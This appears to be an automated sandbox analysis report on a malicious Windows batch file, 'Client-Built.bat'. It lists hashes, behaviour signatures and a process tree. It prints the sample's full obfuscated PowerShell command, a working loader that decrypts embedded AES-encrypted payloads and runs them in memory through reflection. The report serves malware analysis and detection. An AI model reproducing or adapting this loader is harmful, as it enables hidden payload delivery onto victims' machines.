Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    19-10-2024 18:25

General

  • Target

    Client-Built.bat

  • Size

    309KB

  • MD5

    779ea367cf71bed6a1f3b78a48d7c3fd

  • SHA1

    a8a6caee309e724367a686ab9da2a65f3522eba0

  • SHA256

    53666bd18a4e85ff72aac790ea41f603e3d0ce78d12a22bfcdb2e46d1f1d4afd

  • SHA512

    8e54f78210ec383fd24e2fe0bc0beb2d0aad0536443fe88e5f8f10959913bd66000d6448219f3137589c707c85a5e3cac3b03d6fb68cc942543ee51f1e5faa94

  • SSDEEP

    6144:L3pboxHrffvx5qjFakMpbeZuwRLfktxH44ScYQafuqzyFhSd90:LxOrfOupiRLQScYLfuDFs90

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Deletes itself 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Client-Built.bat"
    1⤵
    • Deletes itself
    • Suspicious use of WriteProcessMemory
    PID:1892
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:2648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yhQ3heawMyvGHcN/HVfcC9bTWPMTkS0JHj1mcOoLd0g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3EOLjVuYmh+6EyzRS0NrQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXQbB=New-Object System.IO.MemoryStream(,$param_var); $AUvTu=New-Object System.IO.MemoryStream; $tCRmZ=New-Object System.IO.Compression.GZipStream($vXQbB, [IO.Compression.CompressionMode]::Decompress); $tCRmZ.CopyTo($AUvTu); $tCRmZ.Dispose(); $vXQbB.Dispose(); $AUvTu.Dispose(); $AUvTu.ToArray();}function execute_function($param_var,$param2_var){ $oYOpP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $FcSFc=$oYOpP.EntryPoint; $FcSFc.Invoke($null, $param2_var);}$lXRaI = 'C:\Users\Admin\AppData\Local\Temp\Client-Built.bat';$host.UI.RawUI.WindowTitle = $lXRaI;$enbFg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lXRaI).Split([Environment]::NewLine);foreach ($huNIz in $enbFg) { if ($huNIz.StartsWith(':: ')) { $GZJMV=$huNIz.Substring(3); break; }}$payloads_var=[string[]]$GZJMV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2756

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2756-4-0x000007FEF537E000-0x000007FEF537F000-memory.dmp

      Filesize

      4KB

    • memory/2756-5-0x000000001B570000-0x000000001B852000-memory.dmp

      Filesize

      2.9MB

    • memory/2756-7-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

      Filesize

      9.6MB

    • memory/2756-9-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

      Filesize

      9.6MB

    • memory/2756-8-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

      Filesize

      9.6MB

    • memory/2756-6-0x0000000002250000-0x0000000002258000-memory.dmp

      Filesize

      32KB

    • memory/2756-10-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

      Filesize

      9.6MB

    • memory/2756-11-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

      Filesize

      9.6MB